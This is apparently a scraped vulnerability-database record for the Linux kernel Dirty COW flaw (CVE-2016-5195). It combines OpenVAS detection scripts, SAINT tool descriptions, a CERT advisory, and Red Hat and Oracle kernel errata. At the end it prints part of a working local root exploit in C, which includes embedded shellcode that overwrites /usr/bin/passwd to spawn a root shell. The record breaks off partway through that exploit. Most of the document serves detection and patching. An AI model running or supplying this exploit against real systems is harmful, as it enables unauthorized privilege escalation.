script_oid(\"1.3.6.1.4.1.25623.1.0.871972\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-07 05:22:15 +0100 (Wed, 07 Dec 2016)\");\n script_cve_id(\"CVE-2016-5195\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for kernel FEDORA-2016-c8a0c7eece\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"kernel on Fedora 25\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-c8a0c7eece\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NWMDLBWMGZKFHMRJ7QUQVCERP5QHDB6W\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC25\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC25\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.8.3~300.fc25\", rls:\"FC25\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:59", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-5195"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2016-12-05T00:00:00", "id": "OPENVAS:1361412562310842974", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842974", "type": "openvas", "title": "Ubuntu Update for linux-raspi2 USN-3107-2", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for linux-raspi2 USN-3107-2\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842974\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-05 09:53:02 +0100 (Mon, 05 Dec 2016)\");\n script_cve_id(\"CVE-2016-5195\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux-raspi2 USN-3107-2\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-raspi2'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"It was discovered that a race condition\n existed in the memory manager of the Linux kernel when handling copy-on-write\n breakage of private read-only memory mappings. A local attacker could use this\n to gain administrative privileges.\");\n script_tag(name:\"affected\", value:\"linux-raspi2 on Ubuntu 16.10\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3107-2\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3107-2/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU16\\.10\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU16.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.8.0-1017-raspi2\", ver:\"4.8.0-1017.20\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "saint": [{"lastseen": "2016-11-15T12:42:49", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-5195"], "edition": 3, "description": "Added: 10/27/2016 \nCVE: [CVE-2016-5195](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5195>) \nBID: [93793](<http://www.securityfocus.com/bid/93793>) \n\n\n### Background\n\nThis tool allows you to overwrite an arbitrary file on Linux systems. \n\n### Problem\n\nA race condition exists in the way the Linux kernel's memory subsystem handles the copy-on-write (COW) breakage of private read-only memory mappings. An unprivileged local user could use this flaw to gain write access to otherwise read-only memory mappings and thus gain elevated privileges on the system. \n\n### Resolution\n\nUpgrade to a fixed kernel package from your Linux vendor. \n\n### References\n\n<http://dirtycow.ninja/> \n<https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c> \n\n\n### Limitations\n\nExploit requires an existing unprivileged connection to the target. \n\n### Platforms\n\nLinux \n \n\n", "modified": "2016-10-27T00:00:00", "published": "2016-10-27T00:00:00", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/linux_dirty_cow_local_file_overwrite", "id": "SAINT:D99FE3AF85FA3F5D4D5C3CB8B43F5183", "type": "saint", "title": "Linux Dirty COW Local File Overwrite", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T19:19:26", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-5195"], "edition": 2, "description": "Added: 10/27/2016 \nCVE: [CVE-2016-5195](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5195>) \nBID: [93793](<http://www.securityfocus.com/bid/93793>) \n\n\n### Background\n\nThis tool allows you to overwrite an arbitrary file on Linux systems. \n\n### Problem\n\nA race condition exists in the way the Linux kernel's memory subsystem handles the copy-on-write (COW) breakage of private read-only memory mappings. An unprivileged local user could use this flaw to gain write access to otherwise read-only memory mappings and thus gain elevated privileges on the system. \n\n### Resolution\n\nUpgrade to a fixed kernel package from your Linux vendor. \n\n### References\n\n<http://dirtycow.ninja/> \n<https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c> \n\n\n### Limitations\n\nExploit requires an existing unprivileged connection to the target. \n\n### Platforms\n\nLinux \n \n\n", "modified": "2016-10-27T00:00:00", "published": "2016-10-27T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/linux_dirty_cow_local_file_overwrite", "id": "SAINT:1E3BA1480EBC78481EFFC9BD1CFFBBE2", "type": "saint", "title": "Linux Dirty COW Local File Overwrite", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-06-04T23:19:39", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-5195"], "description": "Added: 10/27/2016 \nCVE: [CVE-2016-5195](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5195>) \nBID: [93793](<http://www.securityfocus.com/bid/93793>) \n\n\n### Background\n\nThis tool allows you to overwrite an arbitrary file on Linux systems. \n\n### Problem\n\nA race condition exists in the way the Linux kernel's memory subsystem handles the copy-on-write (COW) breakage of private read-only memory mappings. An unprivileged local user could use this flaw to gain write access to otherwise read-only memory mappings and thus gain elevated privileges on the system. \n\n### Resolution\n\nUpgrade to a fixed kernel package from your Linux vendor. \n\n### References\n\n<http://dirtycow.ninja/> \n<https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c> \n\n\n### Limitations\n\nExploit requires an existing unprivileged connection to the target. \n\n### Platforms\n\nLinux \n \n\n", "edition": 4, "modified": "2016-10-27T00:00:00", "published": "2016-10-27T00:00:00", "id": "SAINT:ACA0D81E9F0D7499A5952D634DA1559F", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/linux_dirty_cow_local_file_overwrite", "title": "Linux Dirty COW Local File Overwrite", "type": "saint", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "cert": [{"lastseen": "2020-09-18T20:41:19", "bulletinFamily": "info", "cvelist": ["CVE-2016-5195"], "description": "### Overview \n\nThe Linux kernel since version 2.6.22 contains a race condition in the way the copy on write mechanism is handled by the memory subsystem, which may be leveraged locally to gain root privileges.\n\n### Description \n\n[**CWE-362**](<https://cwe.mitre.org/data/definitions/362.html>)**: Concurrent Execution using Shared Resource with Improper Synchonization ('Race Condition') -** CVE-2016-5195\n\nThe Linux kernel since version 2.6.22 contains a race condition in the way the copy on write mechanism is handled by the memory subsystem. A local attacker may leverage this vulnerability in affected systems to gain root privileges. For more information, including proofs of concept, refer to the [Dirty COW disclosure page](<https://dirtycow.ninja/>). \n \nNote that this vulnerability is reported as being actively exploited in the wild. \n \n--- \n \n### Impact \n\nA local, unprivileged attacker can escalate privileges to root. \n \n--- \n \n### Solution \n\n**Apply an update** \n \nLinux kernel versions [4.8.3](<https://cdn.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.8.3>), [4.7.9](<https://cdn.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.7.9>), and [4.4.26](<https://cdn.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.4.26>) address this vulnerability. [Red Hat](<https://access.redhat.com/security/cve/cve-2016-5195>), [Debian](<https://security-tracker.debian.org/tracker/CVE-2016-5195>), and [Ubuntu](<http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-5195.html>) have released patches. Users should apply patches through their Linux distributions' normal update process. \n \n--- \n \n### Vendor Information\n\n243144\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### CentOS Affected\n\nNotified: October 21, 2016 Updated: October 27, 2016 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * [https://www.centos.org/forums/viewtopic.php?f=51&amp;t=59782&amp;hilit=CVE%202016%205195&amp;start=10](<https://www.centos.org/forums/viewtopic.php?f=51&t=59782&hilit=CVE%202016%205195&start=10>)\n\n### CoreOS Affected\n\nNotified: October 21, 2016 Updated: October 24, 2016 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://coreos.com/blog/CVE-2016-5195.html>\n\n### Debian GNU/Linux Affected\n\nNotified: October 21, 2016 Updated: October 24, 2016 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://www.debian.org/security/2016/dsa-3696>\n * <https://security-tracker.debian.org/tracker/CVE-2016-5195>\n\n### Red Hat, Inc. Affected\n\nNotified: October 21, 2016 Updated: October 21, 2016 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://access.redhat.com/security/cve/cve-2016-5195>\n\n### SUSE Linux __ Affected\n\nNotified: October 21, 2016 Updated: October 24, 2016 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nSUSE and the openSUSE project are affected by this issue and we have released updates. \n \n<https://www.suse.com/security/cve/CVE-2016-5195.html>\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://www.suse.com/security/cve/CVE-2016-5195.html>\n\n### Ubuntu Affected\n\nNotified: October 21, 2016 Updated: October 24, 2016 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-5195.html>\n\n### Arista Networks, Inc. __ Not Affected\n\nNotified: October 21, 2016 Updated: October 24, 2016 \n\n**Statement Date: October 24, 2016**\n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nArista Network's software products EOS and Cloud Vision Portal (CVP) are not exploitable by CVE-2016-5195 (Kernel Local Privilege Escalation). \n \nFor further information: \n<https://www.arista.com/en/support/advisories-notices/security-advisories/1753-field-notice-0026>\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://www.arista.com/en/support/advisories-notices/security-advisories/1753-field-notice-0026>\n\n### Peplink __ Not Affected\n\nUpdated: November 17, 2016 \n\n**Statement Date: November 17, 2016**\n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWanting to state that Peplink Pepwave products are not affected by Dirty COW \n \nOur own announcement: \n<https://forum.peplink.com/threads/7579-Unaffected-Security-Notice-for-Dirty-COW-CVE-2016-5195>\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://forum.peplink.com/threads/7579-Unaffected-Security-Notice-for-Dirty-COW-CVE-2016-5195>\n\n### Arch Linux Unknown\n\nNotified: October 21, 2016 Updated: October 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Fedora Project Unknown\n\nNotified: October 21, 2016 Updated: October 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Gentoo Linux Unknown\n\nNotified: October 21, 2016 Updated: October 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Openwall GNU/*/Linux Unknown\n\nNotified: October 21, 2016 Updated: October 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Slackware Linux Inc. Unknown\n\nNotified: October 21, 2016 Updated: October 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Tizen Unknown\n\nNotified: October 21, 2016 Updated: October 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Turbolinux Unknown\n\nNotified: October 21, 2016 Updated: October 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### openSUSE project Unknown\n\nNotified: October 21, 2016 Updated: October 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\nView all 16 vendors __View less vendors __\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | 6.8 | AV:L/AC:L/Au:S/C:C/I:C/A:C \nTemporal | 5.6 | E:F/RL:OF/RC:C \nEnvironmental | 5.6 | CDP:ND/TD:H/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References \n\n * <https://dirtycow.ninja/>\n * <https://access.redhat.com/security/cve/cve-2016-5195>\n * <https://security-tracker.debian.org/tracker/CVE-2016-5195>\n * <http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-5195.html>\n * <https://cdn.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.8.3>\n * <https://cdn.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.7.9>\n * <https://cdn.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.4.26>\n * <https://cwe.mitre.org/data/definitions/362.html>\n\n### Acknowledgements\n\nRed Hat credits Phil Oester with reporting this vulnerability.\n\nThis document was written by Joel Land.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2016-5195](<http://web.nvd.nist.gov/vuln/detail/CVE-2016-5195>) \n---|--- \n**Date Public:** | 2016-10-20 \n**Date First Published:** | 2016-10-21 \n**Date Last Updated: ** | 2016-11-17 13:17 UTC \n**Document Revision: ** | 15 \n", "modified": "2016-11-17T13:17:00", "published": "2016-10-21T00:00:00", "id": "VU:243144", "href": "https://www.kb.cert.org/vuls/id/243144", "type": "cert", "title": "Linux kernel memory subsystem copy on write mechanism contains a race condition vulnerability", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2019-08-13T18:46:40", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5195"], "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* A race condition was found in the way the Linux kernel's memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. An unprivileged, local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system. (CVE-2016-5195, Important)\n\nRed Hat would like to thank Phil Oester for reporting this issue.", "modified": "2018-04-12T03:32:44", "published": "2016-10-24T16:01:05", "id": "RHSA-2016:2098", "href": "https://access.redhat.com/errata/RHSA-2016:2098", "type": "redhat", "title": "(RHSA-2016:2098) Important: kernel security update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:46:44", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5195"], "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* A race condition was found in the way the Linux kernel's memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. An unprivileged, local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system. (CVE-2016-5195, Important)\n\nRed Hat would like to thank Phil Oester for reporting this issue.", "modified": "2018-06-06T20:24:30", "published": "2016-10-26T00:57:14", "id": "RHSA-2016:2105", "href": "https://access.redhat.com/errata/RHSA-2016:2105", "type": "redhat", "title": "(RHSA-2016:2105) Important: kernel security update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:45:09", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5195"], "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* A race condition was found in the way the Linux kernel's memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. An unprivileged, local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system. (CVE-2016-5195, Important)\n\nRed Hat would like to thank Phil Oester for reporting this issue.", "modified": "2016-10-26T21:24:34", "published": "2016-10-26T19:24:13", "id": "RHSA-2016:2118", "href": "https://access.redhat.com/errata/RHSA-2016:2118", "type": "redhat", "title": "(RHSA-2016:2118) Important: kernel security update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:46:13", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5195"], "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* A race condition was found in the way the Linux kernel's memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. An unprivileged, local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system. (CVE-2016-5195, Important)\n\nRed Hat would like to thank Phil Oester for reporting this issue.\n\nBug Fix(es):\n\n* Previously, the BUG_ON() signal appeared in the fs_clear_inode() function where the nfs_have_writebacks() function reported a positive value for nfs_inode->npages. As a consequence, a kernel panic occurred. The provided patch performs a serialization by holding the inode i_lock over the check of PagePrivate and locking the request, which fixes this bug. (BZ#1365157)", "modified": "2016-11-01T17:09:43", "published": "2016-11-01T14:16:02", "id": "RHSA-2016:2132", "href": "https://access.redhat.com/errata/RHSA-2016:2132", "type": "redhat", "title": "(RHSA-2016:2132) Important: kernel security and bug fix update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:44:58", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5195"], "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* A race condition was found in the way the Linux kernel's memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. An unprivileged, local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system. (CVE-2016-5195, Important)\n\nRed Hat would like to thank Phil Oester for reporting this issue.", "modified": "2016-10-27T12:44:17", "published": "2016-10-27T12:41:42", "id": "RHSA-2016:2120", "href": "https://access.redhat.com/errata/RHSA-2016:2120", "type": "redhat", "title": "(RHSA-2016:2120) Important: kernel security update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:38:18", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5195"], "description": "kernel-uek\n[3.8.13-118.13.3]\n- mm, gup: close FOLL MAP_PRIVATE race (Linus Torvalds) [Orabug: 24928591] {CVE-2016-5195}", "edition": 4, "modified": "2016-10-21T00:00:00", "published": "2016-10-21T00:00:00", "id": "ELSA-2016-3633", "href": "http://linux.oracle.com/errata/ELSA-2016-3633.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:19", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5195"], "description": "[2.6.39-400.286.3]\n- mm, gup: close FOLL MAP_PRIVATE race (Linus Torvalds) [Orabug: 24928646] {CVE-2016-5195}", "edition": 4, "modified": "2016-10-22T00:00:00", "published": "2016-10-22T00:00:00", "id": "ELSA-2016-3634", "href": "http://linux.oracle.com/errata/ELSA-2016-3634.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:18", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5195"], "description": "kernel-uek\n[4.1.12-61.1.16]\n- mm: remove gup_flags FOLL_WRITE games from __get_user_pages() (Linus Torvalds) [Orabug: 24927306] {CVE-2016-5195}\n[4.1.12-61.1.15]\n- drivers/nvme: provide a module parameter for setting number of I/O queues (Shan Hai) [Orabug: 24914956] \n- blk-mq: improve warning for running a queue on the wrong CPU (Jens Axboe) [Orabug: 24914956] \n- blk-mq: fix freeze queue race (Shan Hai) [Orabug: 24914956]", "edition": 4, "modified": "2016-10-21T00:00:00", "published": "2016-10-21T00:00:00", "id": "ELSA-2016-3632", "href": "http://linux.oracle.com/errata/ELSA-2016-3632.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:39:12", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5195"], "description": "- [3.10.0-327.36.3.OL7]\n- Oracle Linux certificates (Alexey Petrenko)\n[3.10.0-327.36.3]\n- [mm] remove gup_flags FOLL_WRITE games from __get_user_pages() (Alexander Gordeev) [1385123 1385124] {CVE-2016-5195}", "edition": 4, "modified": "2016-10-24T00:00:00", "published": "2016-10-24T00:00:00", "id": "ELSA-2016-2098", "href": "http://linux.oracle.com/errata/ELSA-2016-2098.html", "title": "kernel security update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:19", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5195"], "description": "[2.6.32-642.6.2]\n- [mm] close FOLL MAP_PRIVATE race (Larry Woodman) [1385116 1385117] {CVE-2016-5195}", "edition": 4, "modified": "2016-10-25T00:00:00", "published": "2016-10-25T00:00:00", "id": "ELSA-2016-2105", "href": "http://linux.oracle.com/errata/ELSA-2016-2105.html", "title": "kernel security update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-01-05T07:15:40", "description": "Exploit for linux platform in category local exploits", "edition": 1, "published": "2016-10-22T00:00:00", "type": "zdt", "title": "DirtyCow Local Root Proof Of Concept Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-5195"], "modified": "2016-10-22T00:00:00", "href": "https://0day.today/exploit/description/25943", "id": "1337DAY-ID-25943", "sourceData": "/*\r\n* (un)comment correct payload first (x86 or x64)!\r\n* \r\n* $ gcc cowroot.c -o cowroot -pthread\r\n* $ ./cowroot\r\n* DirtyCow root privilege escalation\r\n* Backing up /usr/bin/passwd.. to /tmp/bak\r\n* Size of binary: 57048\r\n* Racing, this may take a while..\r\n* /usr/bin/passwd overwritten\r\n* Popping root shell.\r\n* Don't forget to restore /tmp/bak\r\n* thread stopped\r\n* thread stopped\r\n* [email\u00a0protected]:/root/cow# id\r\n* uid=0(root) gid=1000(foo) groups=1000(foo)\r\n*\r\n* @robinverton \r\n*/\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <sys/mman.h>\r\n#include <fcntl.h>\r\n#include <pthread.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n\r\nvoid *map;\r\nint f;\r\nint stop = 0;\r\nstruct stat st;\r\nchar *name;\r\npthread_t pth1,pth2,pth3;\r\n\r\n// change if no permissions to read\r\nchar suid_binary[] = \"/usr/bin/passwd\";\r\n\r\n/*\r\n* $ msfvenom -p linux/x64/exec CMD=/bin/bash PrependSetuid=True -f elf | xxd -i\r\n*/ \r\nunsigned char sc[] = {\r\n 0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,\r\n 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00,\r\n 0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00,\r\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\r\n 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00,\r\n 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00,\r\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00,\r\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,\r\n 0xb1, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xea, 0x00, 0x00, 0x00,\r\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\r\n 0x48, 0x31, 0xff, 0x6a, 0x69, 0x58, 0x0f, 0x05, 0x6a, 0x3b, 0x58, 0x99,\r\n 0x48, 0xbb, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00, 0x53, 0x48,\r\n 0x89, 0xe7, 0x68, 0x2d, 0x63, 0x00, 0x00, 0x48, 0x89, 0xe6, 0x52, 0xe8,\r\n 0x0a, 0x00, 0x00, 0x00, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x62, 0x61, 0x73,\r\n 0x68, 0x00, 0x56, 0x57, 0x48, 0x89, 0xe6, 0x0f, 0x05\r\n};\r\nunsigned int sc_len = 177;\r\n\r\n/*\r\n* $ msfvenom -p linux/x86/exec CMD=/bin/bash PrependSetuid=True -f elf | xxd -i\r\nunsigned char sc[] = {\r\n 0x7f, 0x45, 0x4c, 0x46, 0x01, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,\r\n 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00,\r\n 0x54, 0x80, 0x04, 0x08, 0x34, 0x00, 0x00, 0x00, 0x00, 0x00, 